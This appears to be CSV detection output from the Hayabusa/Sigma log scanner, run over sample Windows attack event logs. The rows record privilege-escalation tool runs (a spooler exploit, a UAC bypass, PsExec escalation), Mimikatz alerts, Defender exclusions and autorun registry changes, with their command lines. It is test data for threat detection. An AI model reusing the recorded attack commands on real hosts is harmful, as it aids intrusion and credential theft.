Control/bits_openvpn.evtx +2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:59.420 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 
+2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 
+09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 
20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: 
C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 
+09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair 
Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process 
Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" 